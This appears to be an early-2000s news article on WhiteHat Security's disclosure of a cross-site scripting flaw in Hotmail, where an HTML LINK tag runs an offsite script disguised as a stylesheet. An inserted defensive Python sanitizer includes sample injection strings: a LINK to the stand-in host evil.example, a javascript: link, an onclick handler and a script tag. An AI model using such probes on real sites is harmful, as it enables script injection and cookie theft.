New Hack Poses Threat to Popular Web Services
UPDATED Cross Site Scripting (CSS), a relatively new method of attack, has once again proven itself to be a formidable opponent in the quest to secure the Web. The attack involves a method whereby an unauthorized script is passed to a Web server for execution – even if the server is secured against running such scripts. Simply by visiting a Web site or by reading an HTML-formatted e-mail, users can potentially become the unwitting victims of malicious hackers.
Leading providers of Internet services such as Microsoft have long advised customers to "Avoid promiscuous Web browsing." However, some of the most mainstream sites, including Microsoft's own Hotmail service, were at risk to a vulnerability discovered by experts at WhiteHat Security.
Although Hotmail was affected, the attack is not vendor specific. The full scope of the findings also includes all HTML-aware web applications.
Upon discovery of the exploit, a handful of leading companies were immediately notified and provided with technical details; they have subsequently addressed the concerns initially raised by WhiteHat's Jeremiah Grossman.
Popular online services such as auctions, message boards, HTML chats, and guestbooks are among those at risk.
Earlier this week, a Japanese auction site called Price Loto experienced a similar attack resulting in considerable damages and a substantial interruption in its services.
By simply placing an HTML "Link" tag in an e-mail or Web application, JavaScript can be executed on behalf of the hosting domain, providing the same trust relationship set aside for legitimate code. According to WhiteHat, the Link tag masquerades an offsite script as a Style sheet. This particular attack represents a new form of CSS attack never before publicly disclosed.
With a few short lines of HTML, security is bypassed, allowing the script to execute or modify files, propagate email viruses, or even steal a cookie -- a file that stores sensitive information -- from Web sites. JavaScript includes a number of robust functions and is often filtered out for security purposes.
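The defensive lesson of the advisory is that filtering `<script>` alone is not enough: an HTML-aware application has to drop every tag it does not explicitly permit, so a `<link>` that pulls in an offsite "stylesheet" is removed whether or not the filter has ever heard of that trick. The Python sanitizer below is an added example, not WhiteHat's or Microsoft's code; the tag allowlist, the `evil.example` host and the sample message body are constructed for illustration.

```python
from html import escape
from html.parser import HTMLParser

# Allowlist: every tag not listed is dropped, so a <link> that loads a script
# disguised as a stylesheet is removed even though no <script> tag is present.
ALLOWED_TAGS = {"p", "br", "b", "i", "em", "strong", "ul", "ol", "li", "a"}
ALLOWED_ATTRS = {"a": {"href"}}  # no on* handlers, no style=, no rel=
SAFE_URL_SCHEMES = ("http://", "https://", "mailto:")  # rejects javascript:, data:, //

class AllowlistSanitizer(HTMLParser):
    def __init__(self):
        super().__init__()  # convert_charrefs=True: decoded text is re-escaped below
        self.out, self.dropped, self.raw_tag = [], [], None

    def handle_starttag(self, tag, attrs):  # names arrive lower-cased (<LINK> -> link)
        if tag not in ALLOWED_TAGS:
            self.dropped.append(tag)  # record for server-side logging/alerting
            self.raw_tag = tag if tag in ("script", "style") else None  # drop their text too
            return
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, ()):
                continue
            if name == "href" and not (value or "").strip().lower().startswith(SAFE_URL_SCHEMES):
                continue
            kept.append(f' {name}="{escape(value or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag == self.raw_tag:
            self.raw_tag = None
        elif tag in ALLOWED_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if self.raw_tag is None:
            self.out.append(escape(data))  # text stays text, never markup

def sanitize(fragment):
    # Returns (clean_html, dropped_tags) for an untrusted HTML fragment.
    parser = AllowlistSanitizer()
    parser.feed(fragment)
    parser.close()  # flush buffered text
    return "".join(parser.out), parser.dropped

# Constructed e-mail body in the shape the advisory describes: a LINK tag whose
# offsite "stylesheet" is really a script, plus two other common probes.
SAMPLE_MESSAGE = (
    '<p>Hi <b>Bob</b>, see <a href="https://example.com/x">this</a>.</p>'
    '<LINK REL="stylesheet" HREF="http://evil.example/payload">'
    '<a href="javascript:run()" onclick="run()">click</a><script>run()</script>'
)
```

The returned `dropped` list is worth writing to a server-side log: a message body that carries `link` or `script` tags is a signal a webmail operator would want to alert on, not just silently strip.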
Given these conditions, it is also possible to flood a particular site address, such as the White House or even Microsoft's own homepage, with overwhelming traffic, effectively launching a denial of service attack. The Code-Red worm followed a similar concept and sought to bring down whitehouse.gov, disrupting Internet traffic and enjoying unprecedented press coverage in the process.
WhiteHat's Tim Orden issued the following statement to BetaNews: "WhiteHat Security is dedicated to assisting in the effort to secure the Internet as a reliable, safe way to exchange ideas, disseminate information and propagate commerce.
"We release information on web application security in order to tighten up what continues to be a relatively lax concern for the public's right to a secure Internet. It is our hope that by publicly releasing information describing web application vulnerabilities, we can remind these public utilities to focus on responsible, secure services for the masses.
"We urge those companies that are truly concerned about offering a secure service to the public to contact us immediately. Many web applications remain insecure and unfit for the public trust. Utilizing our depth of knowledge and due diligence can go a long way towards maximizing the security of any web application."
Companies Scramble to Squash Bugs
Although Microsoft and other affected organizations were not immediately available for comment, Microsoft Spokesperson Jim Desler has since issued a statement.
Desler told BetaNews, "A cross-site scripting vulnerability in Hotmail was brought to our attention late Tuesday afternoon by WhiteHat. Microsoft worked immediately to address the issue and implemented a fix on all Hotmail servers in less than 12 hours of being notified by WhiteHat. To our knowledge, no Hotmail users have been affected and customer information is not in jeopardy."
He continued on, "While Hotmail was the only internet email service identified by WhiteHat, our evidence and WhiteHat's advisory indicate that this issue affects many HTML-aware web applications industry wide. As seen with this recently reported incident, when Microsoft finds issues like this, we move quickly and decisively to address them as part of our ongoing effort to protect customers."
Hotmail is among the many services that were patched prior to publication and are no longer vulnerable to the attack.
An Uncertain Future
Consumer products such as the newly released Windows XP continue the push toward merging traditional desktop software with online services. Microsoft is actively promoting its highly touted .NET architecture to developers, and promises to deliver a plethora of web-based applications that will handle common computing tasks. Rivals such as Sun Microsystems are also following suit with technologies such as Sun's Jini - an alternative whose development precedes .NET.
To provide a seamless experience between different web-based services, Microsoft has endorsed its own Passport authentication system as a universal solution for sign in. Customers will interact with server side applications running on shared web servers, trusting personal as well as financial information to remote systems. Passport will be bolstered by VeriSign technology in cases where additional security measures are required.
However, security experts still have their sights aimed at Passport, placing it under heavy fire. eWEEK reports that a flaw in the technology can place personal information in the hands of malicious individuals who simply have to obtain a cookie from a target system, thereby easily gaining access.
As first reported by BetaNews, AOL is also in the process of phasing in its own authentication system dubbed Magic Carpet. The use of Web-based services is set to become more commonplace as companies roll out their answers to .NET enabled applications.
The full security bulletin, which includes several solutions to mitigate a recurrence of the exploit, can be found at the WhiteHat Web site. Although there has been full public disclosure, the number of web applications that remain at risk cannot be determined.